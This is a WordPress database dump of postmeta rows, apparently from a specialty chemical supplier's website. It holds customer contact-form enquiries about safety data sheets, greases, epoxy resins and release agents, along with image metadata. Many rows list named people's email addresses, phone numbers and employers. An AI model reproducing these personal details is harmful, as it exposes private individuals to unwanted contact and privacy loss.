INSERT INTO `wp_postmeta` VALUES (30866, 3443, '_field_3', 'Please forward this enquiry to Diane (casales@mschem.com)\r\n\r\nI tried to place order by email to Diane (casales@mschem.com). but every email is rejected by your mail server.  So, Please reply to our email : techstore@polysource.co.th  and pls check if this email address is put in rejected list or not.'); 
INSERT INTO `wp_postmeta` VALUES (30867, 3443, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30868, 3443, '_sub_id', '3443'); 
INSERT INTO `wp_postmeta` VALUES (30869, 3444, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30870, 3444, '_seq_num', '232'); 
INSERT INTO `wp_postmeta` VALUES (30871, 3444, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30872, 3444, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30873, 3444, '_field_1', 'Andrea Rodrigues'); 
INSERT INTO `wp_postmeta` VALUES (30874, 3444, '_field_10', 'RUAG Aviation AG'); 
INSERT INTO `wp_postmeta` VALUES (30875, 3444, '_field_2', 'andrea.rodrigues@ruag.com'); 
INSERT INTO `wp_postmeta` VALUES (30876, 3444, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (30877, 3444, '_field_3', 'Hi,\n\nCould you send me the latest MSDS from product MS-452N in German, English and French?\n\nThank you very much.\nBest regards'); 
INSERT INTO `wp_postmeta` VALUES (30878, 3444, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30879, 3444, '_sub_id', '3444'); 
INSERT INTO `wp_postmeta` VALUES (30880, 3445, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30881, 3445, '_seq_num', '233'); 
INSERT INTO `wp_postmeta` VALUES (30882, 3445, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30883, 3445, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30884, 3445, '_field_1', 'Ed Bear'); 
INSERT INTO `wp_postmeta` VALUES (30885, 3445, '_field_10', 'Art2Canvas.net'); 
INSERT INTO `wp_postmeta` VALUES (30886, 3445, '_field_2', 'eddiebear6@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (30887, 3445, '_field_8', '(647) 974-1786'); 
INSERT INTO `wp_postmeta` VALUES (30888, 3445, '_field_3', 'Can you supply or recommend photoiniators for your Epon 8021 Epoxy Acrylate resin ?'); 
INSERT INTO `wp_postmeta` VALUES (30889, 3445, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30890, 3445, '_sub_id', '3445'); 
INSERT INTO `wp_postmeta` VALUES (30891, 3448, '_wp_attached_file', '2016/09/MS-485G.jpg'); 
INSERT INTO `wp_postmeta` VALUES (30892, 3448, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1037;s:6:"height";i:691;s:4:"file";s:19:"2016/09/MS-485G.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-485G-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-485G-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-485G-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-485G-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-485G-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-485G-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-485G-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:12:"Daniel Fahmi";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:8:"OpenCASA";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (30893, 3449, '_wp_attached_file', '2016/09/MS-487G.jpg'); 
INSERT INTO `wp_postmeta` VALUES (30894, 3449, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1037;s:6:"height";i:691;s:4:"file";s:19:"2016/09/MS-487G.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-487G-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-487G-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-487G-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-487G-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-487G-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-487G-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-487G-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:12:"Daniel Fahmi";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:8:"OpenCASA";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (30895, 3450, '_wp_attached_file', '2016/09/shutterstock_484572385.jpg'); 
INSERT INTO `wp_postmeta` VALUES (30896, 3450, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:664;s:4:"file";s:34:"2016/09/shutterstock_484572385.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_484572385-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_484572385-800x531.jpg";s:5:"width";i:800;s:6:"height";i:531;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_484572385-768x510.jpg";s:5:"width";i:768;s:6:"height";i:510;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_484572385-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_484572385-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_484572385-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_484572385-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (30897, 3453, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30898, 3453, '_seq_num', '234'); 
INSERT INTO `wp_postmeta` VALUES (30899, 3453, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30900, 3453, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30901, 3453, '_field_1', 'Josh VanSickle'); 
INSERT INTO `wp_postmeta` VALUES (30902, 3453, '_field_10', 'THK Manufacturing of America'); 
INSERT INTO `wp_postmeta` VALUES (30903, 3453, '_field_2', 'jvansickle@tma.thk.com'); 
INSERT INTO `wp_postmeta` VALUES (30904, 3453, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (30905, 3453, '_field_3', 'Hello,\nWe are looking for a vendor that carries all Krytox greases. We are a located in Ohio.  If you do supply this, what would be the number in which to call to set up a vendor and place orders?\n\nThank you,\nJosh VanSickle'); 
INSERT INTO `wp_postmeta` VALUES (30906, 3453, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30907, 3453, '_sub_id', '3453'); 
INSERT INTO `wp_postmeta` VALUES (30908, 3454, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (30909, 3454, '_seq_num', '195'); 
INSERT INTO `wp_postmeta` VALUES (30910, 3454, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30911, 3454, '_field_12', 'Zayyan Chowdhury'); 
INSERT INTO `wp_postmeta` VALUES (30912, 3454, '_field_13', 'Miller-Stephenson Chemical Co.'); 
INSERT INTO `wp_postmeta` VALUES (30913, 3454, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (30914, 3454, '_field_14', 'zchowdhury@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (30915, 3454, '_field_15', '(203) 743-4447'); 
INSERT INTO `wp_postmeta` VALUES (30916, 3454, '_field_16', 'testestestest'); 
INSERT INTO `wp_postmeta` VALUES (30917, 3454, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (30918, 3454, '_sub_id', '3454'); 
INSERT INTO `wp_postmeta` VALUES (30919, 3455, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30920, 3455, '_seq_num', '235'); 
INSERT INTO `wp_postmeta` VALUES (30921, 3455, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30922, 3455, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30923, 3455, '_field_1', 'Zayyan Chowdhury'); 
INSERT INTO `wp_postmeta` VALUES (30924, 3455, '_field_10', 'Miller-Stephenson Chemical Co.'); 
INSERT INTO `wp_postmeta` VALUES (30925, 3455, '_field_2', 'zchowdhury@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (30926, 3455, '_field_8', '(203) 743-4447'); 
INSERT INTO `wp_postmeta` VALUES (30927, 3455, '_field_3', 'testestestestest'); 
INSERT INTO `wp_postmeta` VALUES (30928, 3455, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30929, 3455, '_sub_id', '3455'); 
INSERT INTO `wp_postmeta` VALUES (30930, 3456, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (30931, 3456, '_seq_num', '196'); 
INSERT INTO `wp_postmeta` VALUES (30932, 3456, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30933, 3456, '_field_12', 'Scott Huelskamp'); 
INSERT INTO `wp_postmeta` VALUES (30934, 3456, '_field_13', 'UDRI'); 
INSERT INTO `wp_postmeta` VALUES (30935, 3456, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (30936, 3456, '_field_14', 'scott.huelskamp@udri.udayton.edu'); 
INSERT INTO `wp_postmeta` VALUES (30937, 3456, '_field_15', '(937) 229-3045'); 
INSERT INTO `wp_postmeta` VALUES (30938, 3456, '_field_16', 'Please send me mix and cure instructions for Epon 862 and Epikure W.  Any instructions regarding VARTM processing would be appreciated as well.\r\n\r\nThank you.\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (30939, 3456, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (30940, 3456, '_sub_id', '3456'); 
INSERT INTO `wp_postmeta` VALUES (30941, 3457, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30942, 3457, '_seq_num', '236'); 
INSERT INTO `wp_postmeta` VALUES (30943, 3457, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30944, 3457, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30945, 3457, '_field_1', 'Steven Thompson'); 
INSERT INTO `wp_postmeta` VALUES (30946, 3457, '_field_10', 'Rev1 Engineering'); 
INSERT INTO `wp_postmeta` VALUES (30947, 3457, '_field_2', 'steve@rev1engineering.com'); 
INSERT INTO `wp_postmeta` VALUES (30948, 3457, '_field_8', '(951) 696-3933'); 
INSERT INTO `wp_postmeta` VALUES (30949, 3457, '_field_3', 'Good Afternoon,\r\n\r\nMy company is researching a coating for a medical device. We need the coating to protect electronics as this device will be placed into the body and come into contact with bodily fluids. The device has sensors that must be protected from any fluid contamination and shorting that may be caused by contact with blood. \r\n\r\nDo you have any products that spray on very thinly and protect the electronics from fluid short circuiting? the coating would have to be less than .0005&quot; in total and provide a decent electrical barrier. '); 
INSERT INTO `wp_postmeta` VALUES (30950, 3457, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30951, 3457, '_sub_id', '3457'); 
INSERT INTO `wp_postmeta` VALUES (30952, 3458, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30953, 3458, '_seq_num', '237'); 
INSERT INTO `wp_postmeta` VALUES (30954, 3458, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30955, 3458, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30956, 3458, '_field_1', 'Ibrahim'); 
INSERT INTO `wp_postmeta` VALUES (30957, 3458, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (30958, 3458, '_field_2', 'ibrahimzazalli@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (30959, 3458, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (30960, 3458, '_field_3', 'In rubber manufacturing, we are using compression mold to produce rubber product.\nCurrently, we got some problem during molding process. our product has stick to the mold.\nOur mold having a many cavities because of our product size were small.\nWe are using diluted silicone as our release agent.\n\ncan you suggest other release agent that might be suitable for our process.\n'); 
INSERT INTO `wp_postmeta` VALUES (30961, 3458, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30962, 3458, '_sub_id', '3458'); 
INSERT INTO `wp_postmeta` VALUES (30963, 3459, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30964, 3459, '_seq_num', '238'); 
INSERT INTO `wp_postmeta` VALUES (30965, 3459, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30966, 3459, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30967, 3459, '_field_1', 'Vincent Farrugia'); 
INSERT INTO `wp_postmeta` VALUES (30968, 3459, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (30969, 3459, '_field_2', 'syntax556@yahoo.com.au'); 
INSERT INTO `wp_postmeta` VALUES (30970, 3459, '_field_8', '(041) 347-0978'); 
INSERT INTO `wp_postmeta` VALUES (30971, 3459, '_field_3', 'I was wondering how much a 1oz bottle of Krytox GPL 103 and 1 oz Krytox GPL 205 grease would cost me and if you ship internationally.'); 
INSERT INTO `wp_postmeta` VALUES (30972, 3459, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30973, 3459, '_sub_id', '3459'); 
INSERT INTO `wp_postmeta` VALUES (30974, 3460, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30975, 3460, '_seq_num', '239'); 
INSERT INTO `wp_postmeta` VALUES (30976, 3460, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30977, 3460, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30978, 3460, '_field_1', 'Chris Delvecchio'); 
INSERT INTO `wp_postmeta` VALUES (30979, 3460, '_field_10', 'Black Box Network Services'); 
INSERT INTO `wp_postmeta` VALUES (30980, 3460, '_field_2', 'christina.delvecchio@blackbox.com'); 
INSERT INTO `wp_postmeta` VALUES (30981, 3460, '_field_8', '(724) 873-6028'); 
INSERT INTO `wp_postmeta` VALUES (30982, 3460, '_field_3', 'Hello I need to order 2 cases / 24 cans total of the MS-260 Plastic-Glass-Metal cleaner. Could I please get a price quote?\nWe have ordered this several times in the past, but our ordering process has changed.\n\nThank You\nChris DelVecchio\nBlack Box Network Services'); 
INSERT INTO `wp_postmeta` VALUES (30983, 3460, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30984, 3460, '_sub_id', '3460'); 
INSERT INTO `wp_postmeta` VALUES (30985, 3461, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30986, 3461, '_seq_num', '240'); 
INSERT INTO `wp_postmeta` VALUES (30987, 3461, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30988, 3461, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (30989, 3461, '_field_1', 'oscar verduzco'); 
INSERT INTO `wp_postmeta` VALUES (30990, 3461, '_field_10', 'Calbiotech Inc'); 
INSERT INTO `wp_postmeta` VALUES (30991, 3461, '_field_2', 'oscar.verduzco@calbiotech.com'); 
INSERT INTO `wp_postmeta` VALUES (30992, 3461, '_field_8', '(619) 660-6162'); 
INSERT INTO `wp_postmeta` VALUES (30993, 3461, '_field_3', 'Trying to purchase item # MS-782 for quantity of 2 gallons. Can i just send the purchase order to you guys or how do I order?\r\n\r\nThanks'); 
INSERT INTO `wp_postmeta` VALUES (30994, 3461, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (30995, 3461, '_sub_id', '3461'); 
INSERT INTO `wp_postmeta` VALUES (30996, 3462, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (30997, 3462, '_seq_num', '241'); 
INSERT INTO `wp_postmeta` VALUES (30998, 3462, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (30999, 3462, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31000, 3462, '_field_1', 'David Dahlheimer'); 
INSERT INTO `wp_postmeta` VALUES (31001, 3462, '_field_10', 'Revolution Composites'); 
INSERT INTO `wp_postmeta` VALUES (31002, 3462, '_field_2', 'david.dahlheimer@revolutioncomposites.com'); 
INSERT INTO `wp_postmeta` VALUES (31003, 3462, '_field_8', '(781) 255-1111'); 
INSERT INTO `wp_postmeta` VALUES (31004, 3462, '_field_3', 'Looking to speak with technical sales rep familiar with EPON 862 epoxy resin system and available hardeners.  Looking for hardener options that will work with our infusion process on a new part.'); 
INSERT INTO `wp_postmeta` VALUES (31005, 3462, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31006, 3462, '_sub_id', '3462'); 
INSERT INTO `wp_postmeta` VALUES (31007, 3463, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (31008, 3463, '_seq_num', '197'); 
INSERT INTO `wp_postmeta` VALUES (31009, 3463, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31010, 3463, '_field_12', 'Leonard Anthony'); 
INSERT INTO `wp_postmeta` VALUES (31011, 3463, '_field_13', 'Pilatus Aircraft Ltd'); 
INSERT INTO `wp_postmeta` VALUES (31012, 3463, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (31013, 3463, '_field_14', 'leonard.anthony@pilatus-aircraft.com'); 
INSERT INTO `wp_postmeta` VALUES (31014, 3463, '_field_15', '(614) 189-5164'); 
INSERT INTO `wp_postmeta` VALUES (31015, 3463, '_field_16', 'Can you kindly provide me with the shelf life of your MS122AD? Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (31016, 3463, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (31017, 3463, '_sub_id', '3463'); 
INSERT INTO `wp_postmeta` VALUES (31018, 3464, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31019, 3464, '_seq_num', '242'); 
INSERT INTO `wp_postmeta` VALUES (31020, 3464, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31021, 3464, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31022, 3464, '_field_1', 'Szesu Soong'); 
INSERT INTO `wp_postmeta` VALUES (31023, 3464, '_field_10', 'Complam Material Co., Ltd., Taiwan.'); 
INSERT INTO `wp_postmeta` VALUES (31024, 3464, '_field_2', 'c922@compla.com'); 
INSERT INTO `wp_postmeta` VALUES (31025, 3464, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (31026, 3464, '_field_3', 'We produce thermoplastic composite laminate sheets for industrial applications. The resin system includes PC, PPS and PEI. Need to know more technical features of your high temperature release agent for evaluation purpose. Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (31027, 3464, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31028, 3464, '_sub_id', '3464'); 
INSERT INTO `wp_postmeta` VALUES (31029, 3465, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31030, 3465, '_seq_num', '243'); 
INSERT INTO `wp_postmeta` VALUES (31031, 3465, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31032, 3465, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31033, 3465, '_field_1', 'Kaushik Parekh'); 
INSERT INTO `wp_postmeta` VALUES (31034, 3465, '_field_10', 'Tide Industries'); 
INSERT INTO `wp_postmeta` VALUES (31035, 3465, '_field_2', 'kaushik@tideind.com'); 
INSERT INTO `wp_postmeta` VALUES (31036, 3465, '_field_8', '(909) 909-7888'); 
INSERT INTO `wp_postmeta` VALUES (31037, 3465, '_field_3', 'We are looking for Release agents for Composite Industry. Please send us information on your products.\r\n\r\nRegards,\r\nKaushik Parekh\r\nTide Industries\r\nIndia'); 
INSERT INTO `wp_postmeta` VALUES (31038, 3465, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31039, 3465, '_sub_id', '3465'); 
INSERT INTO `wp_postmeta` VALUES (31040, 3466, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31041, 3466, '_seq_num', '244'); 
INSERT INTO `wp_postmeta` VALUES (31042, 3466, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31043, 3466, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31044, 3466, '_field_1', 'Pa Cha'); 
INSERT INTO `wp_postmeta` VALUES (31045, 3466, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (31046, 3466, '_field_2', 'pa.s.cha@aero.org'); 
INSERT INTO `wp_postmeta` VALUES (31047, 3466, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (31048, 3466, '_field_3', 'SDS requests for the following products: \n\nMS-470\nMS-266\nMS-930\nMS-200\nMS-195\nMS-190\nMS-171\nMS-122\nMS-180\nMS-220\nMS-240\nMS-222\nMS-485\nMS-500\nMS-111'); 
INSERT INTO `wp_postmeta` VALUES (31049, 3466, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31050, 3466, '_sub_id', '3466'); 
INSERT INTO `wp_postmeta` VALUES (31051, 3467, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31052, 3467, '_seq_num', '245'); 
INSERT INTO `wp_postmeta` VALUES (31053, 3467, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31054, 3467, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31055, 3467, '_field_1', 'Marie Robichaud'); 
INSERT INTO `wp_postmeta` VALUES (31056, 3467, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (31057, 3467, '_field_2', 'marie.robichaud@forces.gc.ca'); 
INSERT INTO `wp_postmeta` VALUES (31058, 3467, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (31059, 3467, '_field_3', 'Can MS-122 be used in lieu of MS-122XD or vice versa MS-122XD used in lieu of MS-122? and if not, what is the difference between them?'); 
INSERT INTO `wp_postmeta` VALUES (31060, 3467, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31061, 3467, '_sub_id', '3467'); 
INSERT INTO `wp_postmeta` VALUES (31062, 3468, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (31063, 3468, '_seq_num', '198'); 
INSERT INTO `wp_postmeta` VALUES (31064, 3468, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31065, 3468, '_field_12', 'Sally Karel'); 
INSERT INTO `wp_postmeta` VALUES (31066, 3468, '_field_13', 'General Dynamics OTS, Inc. Lincoln Operations'); 
INSERT INTO `wp_postmeta` VALUES (31067, 3468, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (31068, 3468, '_field_14', 'Sally.Karel@gd-ots.com'); 
INSERT INTO `wp_postmeta` VALUES (31069, 3468, '_field_15', '(402) 465-6584'); 
INSERT INTO `wp_postmeta` VALUES (31070, 3468, '_field_16', 'I need a copy of the Epi Kure 537 Curing Agent Accelerator Material Safety Data Sheet.  Please e-mail me and thank you very much.'); 
INSERT INTO `wp_postmeta` VALUES (31071, 3468, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (31072, 3468, '_sub_id', '3468'); 
INSERT INTO `wp_postmeta` VALUES (31073, 3469, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31074, 3469, '_seq_num', '246'); 
INSERT INTO `wp_postmeta` VALUES (31075, 3469, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31076, 3469, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31077, 3469, '_field_1', 'Sadella Santos'); 
INSERT INTO `wp_postmeta` VALUES (31078, 3469, '_field_10', 'Drexel University '); 
INSERT INTO `wp_postmeta` VALUES (31079, 3469, '_field_2', 'sadellasantos1@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (31080, 3469, '_field_8', '(302) 824-9369'); 
INSERT INTO `wp_postmeta` VALUES (31081, 3469, '_field_3', 'To whom it may concern,\r\n\r\nWe are a polymers/composites research laboratory from Drexel University and we use EPON 828 in all of our research projects. We would like to purchase 3 gallons of EPON 828. Our previous contact person was a J.McDermott but we are not sure if that contact is still valid. Looking forward to hearing back soon. '); 
INSERT INTO `wp_postmeta` VALUES (31082, 3469, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (31083, 3469, '_sub_id', '3469'); 
INSERT INTO `wp_postmeta` VALUES (31084, 64, '_yoast_wpseo_opengraph-image', 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/cropped-mslogo-1-e1471289515793.png'); 
INSERT INTO `wp_postmeta` VALUES (31087, 3471, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (31088, 3471, '_seq_num', '247'); 
INSERT INTO `wp_postmeta` VALUES (31089, 3471, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (31090, 3471, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (31091, 3471, '_field_1', 'Jamie Wilson'); 
INSERT INTO `wp_postmeta` VALUES (31092, 3471, '_field_10', 'Smarter Tactics'); 
INSERT INTO `wp_postmeta` VALUES (31093, 3471, '_field_2', 'jamiewilson.smartertactics@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (31094, 3471, '_field_8', '(877) 228-1545'); 
